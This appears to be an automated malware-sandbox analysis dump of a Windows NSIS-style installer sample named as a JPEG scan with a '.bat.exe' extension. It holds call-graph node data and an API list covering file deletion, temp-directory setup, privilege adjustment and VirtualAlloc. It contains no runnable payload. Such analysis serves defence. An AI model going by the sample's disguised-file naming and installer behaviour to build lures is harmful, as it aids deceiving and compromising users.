4209->4203 4217 6dda2138 GetProcAddress 4209->4217 4212->4208 4213->4191 4213->4193 4213->4196 4213->4197 4213->4202 4213->4206 4213->4207 4213->4208 4214 6dda1edb GlobalFree 4213->4214 4215 6dda1224 2 API calls 4213->4215 4283 6dda1534 GlobalSize GlobalAlloc 4213->4283 4214->4213 4215->4213 4217->4203 4218 6dda1fa1 4218->4134 4225 6dda22ce 4219->4225 4221 6dda240a GlobalFree 4223 6dda1734 4221->4223 4221->4225 4222 6dda237c GlobalAlloc MultiByteToWideChar 4224 6dda23c9 4222->4224 4227 6dda23a8 GlobalAlloc CLSIDFromString GlobalFree 4222->4227 4223->4144 4223->4145 4223->4158 4224->4221 4296 6dda260a 4224->4296 4225->4221 4225->4222 4225->4224 4226 6dda1224 GlobalAlloc lstrcpynA 4225->4226 4292 6dda12ad 4225->4292 4226->4225 4227->4221 4231 6dda29d2 4229->4231 4230 6dda2a77 EnumResourceTypesA 4232 6dda2a95 4230->4232 4231->4230 4233 6dda2b91 4232->4233 4234 6dda2b86 GetLastError 4232->4234 4233->4158 4234->4233 4236 6dda2288 4235->4236 4237 6dda172d 4236->4237 4238 6dda2293 GlobalAlloc 4236->4238 4237->4136 4238->4236 4243 6dda26a6 4239->4243 4240 6dda2741 GlobalAlloc 4244 6dda2764 4240->4244 4241 6dda2754 4242 6dda275a GlobalSize 4241->4242 4241->4244 4242->4244 4243->4240 4243->4241 4244->4161 4246 6dda2c86 4245->4246 4247 6dda2cc6 GlobalFree 4246->4247 4299 6dda1215 GlobalAlloc 4248->4299 4250 6dda2538 StringFromGUID2 WideCharToMultiByte 4258 6dda24a8 4250->4258 4251 6dda255c WideCharToMultiByte 4251->4258 4252 6dda2527 lstrcpynA 4252->4258 4253 6dda257d wsprintfA 4253->4258 4254 6dda25a1 GlobalFree 4254->4258 4255 6dda25db GlobalFree 4255->4153 4256 6dda1266 2 API calls 4256->4258 4258->4250 4258->4251 4258->4252 4258->4253 4258->4254 4258->4255 4258->4256 4300 6dda12d1 4258->4300 4304 6dda1215 GlobalAlloc 4259->4304 4261 6dda155e 4262 6dda156b 2 API calls 4261->4262 4263 6dda1568 4262->4263 4264 6dda1266 4263->4264 4265 6dda12a8 GlobalFree 4264->4265 4266 6dda126f GlobalAlloc lstrcpynA 4264->4266 4265->4159 4266->4265 4268 6dda1589 4267->4268 4270 6dda157b lstrcpyA 4267->4270 4268->4270 4271 6dda1595 4268->4271 4272 6dda15c2 4270->4272 4271->4272 4273 6dda15b2 wsprintfA 4271->4273 4272->4162 4273->4272 4275 6dda2470 4274->4275 4277 6dda17f3 4274->4277 4276 6dda2489 GlobalFree 4275->4276 4275->4277 4276->4275 4277->4170 4277->4172 4279 6dda1266 2 API calls 4278->4279 4280 6dda1503 4279->4280 4280->4164 4281->4189 4282->4213 4284 6dda1552 4283->4284 4284->4213 4291 6dda1215 GlobalAlloc 4285->4291 4287 6dda1233 lstrcpynA 4287->4208 4288->4218 4289->4209 4290->4208 4291->4287 4293 6dda12b4 4292->4293 4294 6dda1224 2 API calls 4293->4294 4295 6dda12cf 4294->4295 4295->4225 4297 6dda2618 VirtualAlloc 4296->4297 4298 6dda266e 4296->4298 4297->4298 4298->4224 4299->4258 4301 6dda12da 4300->4301 4302 6dda12f9 4300->4302 4301->4302 4303 6dda12e0 lstrcpyA 4301->4303 4302->4258 4303->4302 4304->4261 5380 402583 5381 402588 5380->5381 5382 40259c 5380->5382 5383 402aa9 17 API calls 5381->5383 5384 402acb 17 API calls 5382->5384 5386 402591 5383->5386 5385 4025a3 lstrlenA 5384->5385 5385->5386 5387 405baa WriteFile 5386->5387 5388 4025c5 5386->5388 5387->5388 5389 6dda221e 5390 6dda2288 5389->5390 5391 6dda22b2 5390->5391 5392 6dda2293 GlobalAlloc 5390->5392 5392->5390 5393 405005 5394 405015 5393->5394 5395 405029 5393->5395 5396 405072 5394->5396 5397 40501b 5394->5397 5398 405031 IsWindowVisible 5395->5398 5404 405048 5395->5404 5399 405077 CallWindowProcA 5396->5399 5400 404055 SendMessageA 5397->5400 5398->5396 5401 40503e 5398->5401 5402 405025 5399->5402 5400->5402 5406 40495c SendMessageA 5401->5406 5404->5399 5411 4049dc 5404->5411 5407 4049bb SendMessageA 5406->5407 5408 40497f GetMessagePos ScreenToClient SendMessageA 5406->5408 5410 4049b3 5407->5410 5409 4049b8 5408->5409 5408->5410 5409->5407 5410->5404 5420 405f6a lstrcpynA 5411->5420 5413 4049ef 5421 405ec8 wsprintfA 5413->5421 5415 4049f9 5416 40140b 2 API calls 5415->5416 5417 404a02 5416->5417 5422 405f6a lstrcpynA 5417->5422 5419 404a09 5419->5396 5420->5413 5421->5415 5422->5419 5423 402688 5424 40268f 5423->5424 5427 402904 5423->5427 5425 402aa9 17 API calls 5424->5425 5426 402696 5425->5426 5428 4026a5 SetFilePointer 5426->5428 5428->5427 5429 4026b5 5428->5429 5431 405ec8 wsprintfA 5429->5431 5431->5427 5432 401c0a 5433 402aa9 17 API calls 5432->5433 5434 401c11 5433->5434 5435 402aa9 17 API calls 5434->5435 5436 401c1e 5435->5436 5437 402acb 17 API calls 5436->5437 5439 401c33 5436->5439 5437->5439 5438 401c43 5441 401c9a 5438->5441 5442 401c4e 5438->5442 5439->5438 5440 402acb 17 API calls 5439->5440 5440->5438 5444 402acb 17 API calls 5441->5444 5443 402aa9 17 API calls 5442->5443 5446 401c53 5443->5446 5445 401c9f 5444->5445 5447 402acb 17 API calls 5445->5447 5448 402aa9 17 API calls 5446->5448 5449 401ca8 FindWindowExA 5447->5449 5450 401c5f 5448->5450 5453 401cc6 5449->5453 5451 401c8a SendMessageA 5450->5451 5452 401c6c SendMessageTimeoutA 5450->5452 5451->5453 5452->5453 5454 404a0e GetDlgItem GetDlgItem 5455 404a60 7 API calls 5454->5455 5460 404c78 5454->5460 5456 404b03 DeleteObject 5455->5456 5457 404af6 SendMessageA 5455->5457 5458 404b0c 5456->5458 5457->5456 5461 404b43 5458->5461 5462 405f8c 17 API calls 5458->5462 5459 404d5c 5464 404e08 5459->5464 5469 404c6b 5459->5469 5474 404db5 SendMessageA 5459->5474 5460->5459 5472 40495c 5 API calls 5460->5472 5488 404ce9 5460->5488 5463 404009 18 API calls 5461->5463 5465 404b25 SendMessageA SendMessageA 5462->5465 5468 404b57 5463->5468 5466 404e12 SendMessageA 5464->5466 5467 404e1a 5464->5467 5465->5458 5466->5467 5476 404e33 5467->5476 5477 404e2c ImageList_Destroy 5467->5477 5485 404e43 5467->5485 5473 404009 18 API calls 5468->5473 5470 404070 8 API calls 5469->5470 5475 404ffe 5470->5475 5471 404d4e SendMessageA 5471->5459 5472->5488 5489 404b65 5473->5489 5474->5469 5479 404dca SendMessageA 5474->5479 5480 404e3c GlobalFree 5476->5480 5476->5485 5477->5476 5478 404fb2 5478->5469 5483 404fc4 ShowWindow GetDlgItem ShowWindow 5478->5483 5482 404ddd 5479->5482 5480->5485 5481 404c39 GetWindowLongA SetWindowLongA 5484 404c52 5481->5484 5490 404dee SendMessageA 5482->5490 5483->5469 5486 404c70 5484->5486 5487 404c58 ShowWindow 5484->5487 5485->5478 5497 4049dc 4 API calls 5485->5497 5501 404e7e 5485->5501 5506 40403e SendMessageA 5486->5506 5505 40403e SendMessageA 5487->5505 5488->5459 5488->5471 5489->5481 5491 404c33 5489->5491 5494 404bb4 SendMessageA 5489->5494 5495 404bf0 SendMessageA 5489->5495 5496 404c01 SendMessageA 5489->5496 5490->5464 5491->5481 5491->5484 5494->5489 5495->5489 5496->5489 5497->5501 5498 404f88 InvalidateRect 5498->5478 5499 404f9e 5498->5499 5507 404917 5499->5507 5500 404eac SendMessageA 5504 404ec2 5500->5504 5501->5500 5501->5504 5503 404f36 SendMessageA SendMessageA 5503->5504 5504->5498 5504->5503 5505->5469 5506->5460 5510 404852 5507->5510 5509 40492c 5509->5478 5511 404868 5510->5511 5512 405f8c 17 API calls 5511->5512 5513 4048cc 5512->5513 5514 405f8c 17 API calls 5513->5514 5515 4048d7 5514->5515 5516 405f8c 17 API calls 5515->5516 5517 4048ed lstrlenA wsprintfA SetDlgItemTextA 5516->5517 5517->5509 5518 401490 5519 405091 24 API calls 5518->5519 5520 401497 5519->5520 5521 406895 5525 40647a 5521->5525 5522 406de5 5523 406504 GlobalAlloc 5523->5522 5523->5525 5524 4064fb GlobalFree 5524->5523 5525->5522 5525->5523 5525->5524 5525->5525 5526 406572 GlobalFree 5525->5526 5527 40657b GlobalAlloc 5525->5527 5526->5527 5527->5522 5527->5525 5528 6dda1000 5531 6dda101b 5528->5531 5532 6dda14bb GlobalFree 5531->5532 5533 6dda1020 5532->5533 5534 6dda1027 GlobalAlloc 5533->5534 5535 6dda1024 5533->5535 5534->5535 5536 6dda14e2 3 API calls 5535->5536 5537 6dda1019 5536->5537 5538 40449b 5539 4044c7 5538->5539 5540 4044d8 5538->5540 5599 40566a GetDlgItemTextA 5539->5599 5542 4044e4 GetDlgItem 5540->5542 5548 404543 5540->5548 5543 4044f8 5542->5543 5547 40450c SetWindowTextA 5543->5547 5551 40599b 4 API calls 5543->5551 5544 404627 5597 4047d1 5544->5597 5601 40566a GetDlgItemTextA 5544->5601 5545 4044d2 5546 4061d4 5 API calls 5545->5546 5546->5540 5552 404009 18 API calls 5547->5552 5548->5544 5553 405f8c 17 API calls 5548->5553 5548->5597 5550 404070 8 API calls 5555 4047e5 5550->5555 5556 404502 5551->5556 5557 404528 5552->5557 5558 4045b7 SHBrowseForFolderA 5553->5558 5554 404657 5559 4059f0 18 API calls 5554->5559 5556->5547 5563 405902 3 API calls 5556->5563 5560 404009 18 API calls 5557->5560 5558->5544 5561 4045cf CoTaskMemFree 5558->5561 5562 40465d 5559->5562 5564 404536 5560->5564 5565 405902 3 API calls 5561->5565 5602 405f6a lstrcpynA 5562->5602 5563->5547 5600 40403e SendMessageA 5564->5600 5567 4045dc 5565->5567 5570 404613 SetDlgItemTextA 5567->5570 5574 405f8c 17 API calls 5567->5574 5569 40453c 5572 406302 5 API calls 5569->5572 5570->5544 5571 404674 5573 406302 5 API calls 5571->5573 5572->5548 5580 40467b 5573->5580 5575 4045fb lstrcmpiA 5574->5575 5575->5570 5577 40460c lstrcatA 5575->5577 5576 4046b7 5603 405f6a lstrcpynA 5576->5603 5577->5570 5579 4046be 5581 40599b 4 API calls 5579->5581 5580->5576 5585 405949 2 API calls 5580->5585 5586 40470f 5580->5586 5582 4046c4 GetDiskFreeSpaceA 5581->5582 5584 4046e8 MulDiv 5582->5584 5582->5586 5584->5586 5585->5580 5587 404780 5586->5587 5589 404917 20 API calls 5586->5589 5588 4047a3 5587->5588 5590 40140b 2 API calls 5587->5590 5604 40402b KiUserCallbackDispatcher 5588->5604 5591 40476d 5589->5591 5590->5588 5593 404782 SetDlgItemTextA 5591->5593 5594 404772 5591->5594 5593->5587 5595 404852 20 API calls 5594->5595 5595->5587 5596 4047bf 5596->5597 5598 4043f4 SendMessageA 5596->5598 5597->5550 5598->5597 5599->5545 5600->5569 5601->5554 5602->5571 5603->5579 5604->5596 5605 401d9b GetDC 5606 402aa9 17 API calls 5605->5606 5607 401dad GetDeviceCaps MulDiv ReleaseDC 5606->5607 5608 402aa9 17 API calls 5607->5608 5609 401dde 5608->5609 5610 405f8c 17 API calls 5609->5610 5611 401e1b CreateFontIndirectA 5610->5611 5612 40257d 5611->5612 5613 40149d 5614 4022e7 5613->5614 5615 4014ab PostQuitMessage 5613->5615 5615->5614 5616 40159d 5617 402acb 17 API calls 5616->5617 5618 4015a4 SetFileAttributesA 5617->5618 5619 4015b6 5618->5619 5620 401a1e 5621 402acb 17 API calls 5620->5621 5622 401a27 ExpandEnvironmentStringsA 5621->5622 5623 401a3b 5622->5623 5625 401a4e 5622->5625 5624 401a40 lstrcmpA 5623->5624 5623->5625 5624->5625 5631 40171f 5632 402acb 17 API calls 5631->5632 5633 401726 SearchPathA 5632->5633 5634 401741 5633->5634 5635 401d20 5636 402aa9 17 API calls 5635->5636 5637 401d2e SetWindowLongA 5636->5637 5638 402957 5637->5638 5639 6dda183b 5641 6dda185e 5639->5641 5640 6dda18a0 5643 6dda1266 2 API calls 5640->5643 5641->5640 5642 6dda188e GlobalFree 5641->5642 5642->5640 5644 6dda1a22 GlobalFree GlobalFree 5643->5644 5645 6dda163c 5646 6dda166b 5645->5646 5647 6dda1a9c 18 API calls 5646->5647 5648 6dda1672 5647->5648 5649 6dda1679 5648->5649 5650 6dda1685 5648->5650 5651 6dda1266 2 API calls 5649->5651 5652 6dda168f 5650->5652 5653 6dda16ac 5650->5653 5656 6dda1683 5651->5656 5657 6dda14e2 3 API calls 5652->5657 5654 6dda16b2 5653->5654 5655 6dda16d6 5653->5655 5658 6dda1559 3 API calls 5654->5658 5659 6dda14e2 3 API calls 5655->5659 5660 6dda1694 5657->5660 5661 6dda16b7 5658->5661 5659->5656 5662 6dda1559 3 API calls 5660->5662 5663 6dda1266 2 API calls 5661->5663 5664 6dda169a 5662->5664 5666 6dda16bd GlobalFree 5663->5666 5665 6dda1266 2 API calls 5664->5665 5667 6dda16a0 GlobalFree 5665->5667 5666->5656 5668 6dda16d1 GlobalFree 5666->5668 5667->5656 5668->5656 5669 6dda103d 5670 6dda101b 5 API calls 5669->5670 5671 6dda1056 5670->5671 4315 401e2b 4323 402aa9 4315->4323 4317 401e31 4318 402aa9 17 API calls 4317->4318 4319 401e3d 4318->4319 4320 401e54 EnableWindow 4319->4320 4321 401e49 ShowWindow 4319->4321 4322 402957 4320->4322 4321->4322 4324 405f8c 17 API calls 4323->4324 4325 402abe 4324->4325 4325->4317 5686 401f31 5687 402acb 17 API calls 5686->5687 5688 401f38 5687->5688 5689 40626d 2 API calls 5688->5689 5690 401f3e 5689->5690 5692 401f50 5690->5692 5693 405ec8 wsprintfA 5690->5693 5693->5692 4409 401932 4410 401934 4409->4410 4411 402acb 17 API calls 4410->4411 4412 401939 4411->4412 4415 405732 4412->4415 4455 4059f0 4415->4455 4418 405771 4421 40589f 4418->4421 4469 405f6a lstrcpynA 4418->4469 4419 40575a DeleteFileA 4420 401942 4419->4420 4421->4420 4487 40626d FindFirstFileA 4421->4487 4423 405797 4424 4057aa 4423->4424 4425 40579d lstrcatA 4423->4425 4470 405949 lstrlenA 4424->4470 4427 4057b0 4425->4427 4430 4057be lstrcatA 4427->4430 4432 4057c9 lstrlenA FindFirstFileA 4427->4432 4430->4432 4431 4058c7 4490 405902 lstrlenA CharPrevA 4431->4490 4432->4421 4443 4057ed 4432->4443 4434 40592d CharNextA 4434->4443 4436 4056ea 5 API calls 4437 4058d9 4436->4437 4438 4058f3 4437->4438 4442 4058dd 4437->4442 4439 405091 24 API calls 4438->4439 4439->4420 4440 40587e FindNextFileA 4440->4443 4444 405896 FindClose 4440->4444 4442->4420 4445 405091 24 API calls 4442->4445 4443->4434 4443->4440 4451 40583f 4443->4451 4474 405f6a lstrcpynA 4443->4474 4444->4421 4446 4058ea 4445->4446 4448 405d49 36 API calls 4446->4448 4450 4058f1 4448->4450 4449 405732 60 API calls 4449->4451 4450->4420 4451->4440 4451->4449 4452 405091 24 API calls 4451->4452 4453 405091 24 API calls 4451->4453 4475 4056ea 4451->4475 4483 405d49 MoveFileExA 4451->4483 4452->4440 4453->4451 4493 405f6a lstrcpynA 4455->4493 4457 405a01 4494 40599b CharNextA CharNextA 4457->4494 4460 405752 4460->4418 4460->4419 4461 4061d4 5 API calls 4467 405a17 4461->4467 4462 405a42 lstrlenA 4463 405a4d 4462->4463 4462->4467 4464 405902 3 API calls 4463->4464 4466 405a52 GetFileAttributesA 4464->4466 4465 40626d 2 API calls 4465->4467 4466->4460 4467->4460 4467->4462 4467->4465 4468 405949 2 API calls 4467->4468 4468->4462 4469->4423 4471 405956 4470->4471 4472 405967 4471->4472 4473 40595b CharPrevA 4471->4473 4472->4427 4473->4471 4473->4472 4474->4443 4500 405ade GetFileAttributesA 4475->4500 4478 405717 4478->4451 4479 405705 RemoveDirectoryA 4481 405713 4479->4481 4480 40570d DeleteFileA 4480->4481 4481->4478 4482 405723 SetFileAttributesA 4481->4482 4482->4478 4484 405d6a 4483->4484 4485 405d5d 4483->4485 4484->4451 4503 405bd9 4485->4503 4488 406283 FindClose 4487->4488 4489 4058c3 4487->4489 4488->4489 4489->4420 4489->4431 4491 4058cd 4490->4491 4492 40591c lstrcatA 4490->4492 4491->4436 4492->4491 4493->4457 4495 4059c6 4494->4495 4496 4059b6 4494->4496 4498 40592d CharNextA 4495->4498 4499 4059e6 4495->4499 4496->4495 4497 4059c1 CharNextA 4496->4497 4497->4499 4498->4495 4499->4460 4499->4461 4501 405af0 SetFileAttributesA 4500->4501 4502 4056f6 4500->4502 4501->4502 4502->4478 4502->4479 4502->4480 4504 405c25 GetShortPathNameA 4503->4504 4505 405bff 4503->4505 4507 405d44 4504->4507 4508 405c3a 4504->4508 4530 405b03 GetFileAttributesA CreateFileA 4505->4530 4507->4484 4508->4507 4510 405c42 wsprintfA 4508->4510 4509 405c09 CloseHandle GetShortPathNameA 4509->4507 4511 405c1d 4509->4511 4512 405f8c 17 API calls 4510->4512 4511->4504 4511->4507 4513 405c6a 4512->4513 4531 405b03 GetFileAttributesA CreateFileA 4513->4531 4515 405c77 4515->4507 4516 405c86 GetFileSize GlobalAlloc 4515->4516 4517 405ca8 4516->4517 4518 405d3d CloseHandle 4516->4518 4532 405b7b ReadFile 4517->4532 4518->4507 4523 405cc7 lstrcpyA 4528 405ce9 4523->4528 4524 405cdb 4525 405a68 4 API calls 4524->4525 4525->4528 4526 405d20 SetFilePointer 4539 405baa WriteFile 4526->4539 4528->4526 4530->4509 4531->4515 4533 405b99 4532->4533 4533->4518 4534 405a68 lstrlenA 4533->4534 4535 405aa9 lstrlenA 4534->4535 4536 405ab1 4535->4536 4537 405a82 lstrcmpiA 4535->4537 4536->4523 4536->4524 4537->4536 4538 405aa0 CharNextA 4537->4538 4538->4535 4540 405bc8 GlobalFree 4539->4540 4540->4518 5694 402932 SendMessageA 5695 402957 5694->5695 5696 40294c InvalidateRect 5694->5696 5696->5695 4541 403b35 4542 403c88 4541->4542 4543 403b4d 4541->4543 4545 403cd9 4542->4545 4546 403c99 GetDlgItem GetDlgItem 4542->4546 4543->4542 4544 403b59 4543->4544 4548 403b64 SetWindowPos 4544->4548 4549 403b77 4544->4549 4547 403d33 4545->4547 4555 401389 2 API calls 4545->4555 4550 404009 18 API calls 4546->4550 4551 404055 SendMessageA 4547->4551 4572 403c83 4547->4572 4548->4549 4552 403b94 4549->4552 4553 403b7c ShowWindow 4549->4553 4554 403cc3 SetClassLongA 4550->4554 4578 403d45 4551->4578 4556 403bb6 4552->4556 4557 403b9c DestroyWindow 4552->4557 4553->4552 4558 40140b 2 API calls 4554->4558 4561 403d0b 4555->4561 4559 403bbb SetWindowLongA 4556->4559 4560 403bcc 4556->4560 4611 403f92 4557->4611 4558->4545 4559->4572 4562 403c75 4560->4562 4563 403bd8 GetDlgItem 4560->4563 4561->4547 4564 403d0f SendMessageA 4561->4564 4569 404070 8 API calls 4562->4569 4567 403c08 4563->4567 4568 403beb SendMessageA IsWindowEnabled 4563->4568 4564->4572 4565 40140b 2 API calls 4565->4578 4566 403f94 DestroyWindow EndDialog 4566->4611 4573 403c15 4567->4573 4575 403c5c SendMessageA 4567->4575 4576 403c28 4567->4576 4585 403c0d 4567->4585 4568->4567 4568->4572 4569->4572 4570 403fc3 ShowWindow 4570->4572 4571 405f8c 17 API calls 4571->4578 4573->4575 4573->4585 4574 403fe2 SendMessageA 4577 403c43 4574->4577 4575->4562 4579 403c30 4576->4579 4580 403c45 4576->4580 4577->4562 4578->4565 4578->4566 4578->4571 4578->4572 4581 404009 18 API calls 4578->4581 4586 404009 18 API calls 4578->4586 4602 403ed4 DestroyWindow 4578->4602 4618 40140b 4579->4618 4582 40140b 2 API calls 4580->4582 4581->4578 4584 403c4c 4582->4584 4584->4562 4584->4585 4585->4574 4587 403dc0 GetDlgItem 4586->4587 4588 403dd5 4587->4588 4589 403ddd ShowWindow KiUserCallbackDispatcher 4587->4589 4588->4589 4612 40402b KiUserCallbackDispatcher 4589->4612 4591 403e07 EnableWindow 4596 403e1b 4591->4596 4592 403e20 GetSystemMenu EnableMenuItem SendMessageA 4593 403e50 SendMessageA 4592->4593 4592->4596 4593->4596 4596->4592 4613 40403e SendMessageA 4596->4613 4614 403b16 4596->4614 4617 405f6a lstrcpynA 4596->4617 4598 403e7f lstrlenA 4599 405f8c 17 API calls 4598->4599 4600 403e90 SetWindowTextA 4599->4600 4601 401389 2 API calls 4600->4601 4601->4578 4603 403eee CreateDialogParamA 4602->4603 4602->4611 4604 403f21 4603->4604 4603->4611 4605 404009 18 API calls 4604->4605 4606 403f2c GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4605->4606 4607 401389 2 API calls 4606->4607 4608 403f72 4607->4608 4608->4572 4609 403f7a ShowWindow 4608->4609 4610 404055 SendMessageA 4609->4610 4610->4611 4611->4570 4611->4572 4612->4591 4613->4596 4615 405f8c 17 API calls 4614->4615 4616 403b24 SetWindowTextA 4615->4616 4616->4596 4617->4598 4619 401389 2 API calls 4618->4619 4620 401420 4619->4620 4620->4585 5704 4014b7 5705 4014bd 5704->5705 5706 401389 2 API calls 5705->5706 5707 4014c5 5706->5707 5708 4026ba 5709 4026c0 5708->5709 5710 4026c8 FindClose 5709->5710 5711 402957 5709->5711 5710->5711 4971 4015bb 4972 402acb 17 API calls 4971->4972 4973 4015c2 4972->4973 4974 40599b 4 API calls 4973->4974 4986 4015ca 4974->4986 4975 401624 4976 401652 4975->4976 4977 401629 4975->4977 4981 401423 24 API calls 4976->4981 4979 401423 24 API calls 4977->4979 4978 40592d CharNextA 4978->4986 4980 401630 4979->4980 4990 405f6a lstrcpynA 4980->4990 4987 40164a 4981->4987 4983 4055d4 2 API calls 4983->4986 4984 4055f1 5 API calls 4984->4986 4985 40163b SetCurrentDirectoryA 4985->4987 4986->4975 4986->4978 4986->4983 4986->4984 4988 40160c GetFileAttributesA 4986->4988 4989 405557 4 API calls 4986->4989 4988->4986 4989->4986 4990->4985 5712 4016bb 5713 402acb 17 API calls 5712->5713 5714 4016c1 GetFullPathNameA 5713->5714 5715 4016d8 5714->5715 5721 4016f9 5714->5721 5717 40626d 2 API calls 5715->5717 5715->5721 5716 40170d GetShortPathNameA 5719 402957 5716->5719 5718 4016e9 5717->5718 5718->5721 5722 405f6a lstrcpynA 5718->5722 5721->5716 5721->5719 5722->5721 5723 40273c 5724 402acb 17 API calls 5723->5724 5725 40274a 5724->5725 5726 402760 5725->5726 5727 402acb 17 API calls 5725->5727 5728 405ade 2 API calls 5726->5728 5727->5726 5729 402766 5728->5729 5751 405b03 GetFileAttributesA CreateFileA 5729->5751 5731 402773 5732 40281c 5731->5732 5733 40277f GlobalAlloc 5731->5733 5736 402824 DeleteFileA 5732->5736 5737 402837 5732->5737 5734 402813 CloseHandle 5733->5734 5735 402798 5733->5735 5734->5732 5752 40318e SetFilePointer 5735->5752 5736->5737 5739 40279e 5740 403178 ReadFile 5739->5740 5741 4027a7 GlobalAlloc 5740->5741 5742 4027f1 5741->5742 5743 4027b7 5741->5743 5745 405baa WriteFile 5742->5745 5744 402f9c 35 API calls 5743->5744 5750 4027c4 5744->5750 5746 4027fd GlobalFree 5745->5746 5747 402f9c 35 API calls 5746->5747 5749 402810 5747->5749 5748 4027e8 GlobalFree 5748->5742 5749->5734 5750->5748 5751->5731 5752->5739 5753 40283d 5754 402aa9 17 API calls 5753->5754 5755 402843 5754->5755 5756 402882 5755->5756 5757 40286b 5755->5757 5764 40271c 5755->5764 5758 40289c 5756->5758 5759 40288c 5756->5759 5760 402870 5757->5760 5761 40287f 5757->5761 5763 405f8c 17 API calls 5758->5763 5762 402aa9 17 API calls 5759->5762 5767 405f6a lstrcpynA 5760->5767 5768 405ec8 wsprintfA 5761->5768 5762->5764 5763->5764 5767->5764 5768->5764 5769 40413f lstrcpynA lstrlenA 5770 401b3f 5771 402acb 17 API calls 5770->5771 5772 401b46 5771->5772 5773 402aa9 17 API calls 5772->5773 5774 401b4f wsprintfA 5773->5774 5775 402957 5774->5775

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 4031d6-403215 SetErrorMode GetVersion 1 403217-40321f call 406302 0->1 2 403228 0->2 1->2 8 403221 1->8 3 40322d-403240 call 406294 lstrlenA 2->3 9 403242-40325e call 406302 * 3 3->9 8->2 16 403260-403266 9->16 17 40326f-4032cd #17 OleInitialize SHGetFileInfoA call 405f6a GetCommandLineA call 405f6a 9->17 16->17 22 403268 16->22 24 4032d9-4032ee call 40592d CharNextA 17->24 25 4032cf-4032d4 17->25 22->17 28 4033b3-4033b7 24->28 25->24 29 4032f3-4032f6 28->29 30 4033bd 28->30 31 4032f8-4032fc 29->31 32 4032fe-403306 29->32 33 4033d0-4033ea GetTempPathA call 4031a5 30->33 31->31 31->32 34 403308-403309 32->34 35 40330e-403311 32->35 40 403442-40345c DeleteFileA call 402d63 33->40 41 4033ec-40340a GetWindowsDirectoryA lstrcatA call 4031a5 33->41 34->35 38 4033a3-4033b0 call 40592d 35->38 39 403317-40331b 35->39 38->28 57 4033b2 38->57 43 403333-403360 39->43 44 40331d-403323 39->44 59 4034f0-403500 call 4036be OleUninitialize 40->59 60 403462-403468 40->60 41->40 58 40340c-40343c GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031a5 41->58 46 403362-403368 43->46 47 403373-4033a1 43->47 50 403325-403327 44->50 51 403329 44->51 53 40336a-40336c 46->53 54 40336e 46->54 47->38 55 4033bf-4033cb call 405f6a 47->55 50->43 50->51 51->43 53->47 53->54 54->47 55->33 57->28 58->40 58->59 70 403624-40362a 59->70 71 403506-403516 call 405686 ExitProcess 59->71 63 4034e0-4034e7 call 403798 60->63 64 40346a-403475 call 40592d 60->64 72 4034ec 63->72 77 403477-4034a0 64->77 78 4034ab-4034b5 64->78 75 4036a6-4036ae 70->75 76 40362c-403645 GetCurrentProcess OpenProcessToken 70->76 72->59 79 4036b0 75->79 80 4036b4-4036b8 ExitProcess 75->80 84 403677-403685 call 406302 76->84 85 403647-403671 LookupPrivilegeValueA AdjustTokenPrivileges 76->85 86 4034a2-4034a4 77->86 82 4034b7-4034c4 call 4059f0 78->82 83 40351c-403530 call 4055f1 lstrcatA 78->83 79->80 82->59 94 4034c6-4034dc call 405f6a * 2 82->94 95 403532-403538 lstrcatA 83->95 96 40353d-403557 lstrcatA lstrcmpiA 83->96 97 403693-40369d ExitWindowsEx 84->97 98 403687-403691 84->98 85->84 86->78 87 4034a6-4034a9 86->87 87->78 87->86 94->63 95->96 96->59 100 403559-40355c 96->100 97->75 101 40369f-4036a1 call 40140b 97->101 98->97 98->101 103 403565 call 4055d4 100->103 104 40355e-403563 call 405557 100->104 101->75 112 40356a-403577 SetCurrentDirectoryA 103->112 104->112 113 403584-4035ac call 405f6a 112->113 114 403579-40357f call 405f6a 112->114 118 4035b2-4035ce call 405f8c DeleteFileA 113->118 114->113 121 4035d0-4035e0 CopyFileA 118->121 122 40360f-403616 118->122 121->122 124 4035e2-4035fb call 405d49 call 405f8c call 405609 121->124 122->118 123 403618-40361f call 405d49 122->123 123->59 132 403600-403602 124->132 132->122 133 403604-40360b CloseHandle 132->133 133->122
                                  APIs
                                  • SetErrorMode.KERNELBASE ref: 004031FB
                                  • GetVersion.KERNEL32 ref: 00403201
                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403234
                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403270
                                  • OleInitialize.OLE32(00000000), ref: 00403277
                                  • SHGetFileInfoA.SHELL32(0041ECC8,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403293
                                  • GetCommandLineA.KERNEL32(00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 004032A8
                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe",00000020,"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe",00000000,?,00000006,00000008,0000000A), ref: 004032E4
                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 004033E1
                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004033F2
                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004033FE
                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403412
                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040341A
                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040342B
                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403433
                                  • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403447
                                    • Part of subcall function 00406302: GetModuleHandleA.KERNEL32(?,?,?,00403249,0000000A), ref: 00406314
                                    • Part of subcall function 00406302: GetProcAddress.KERNEL32(00000000,?), ref: 0040632F
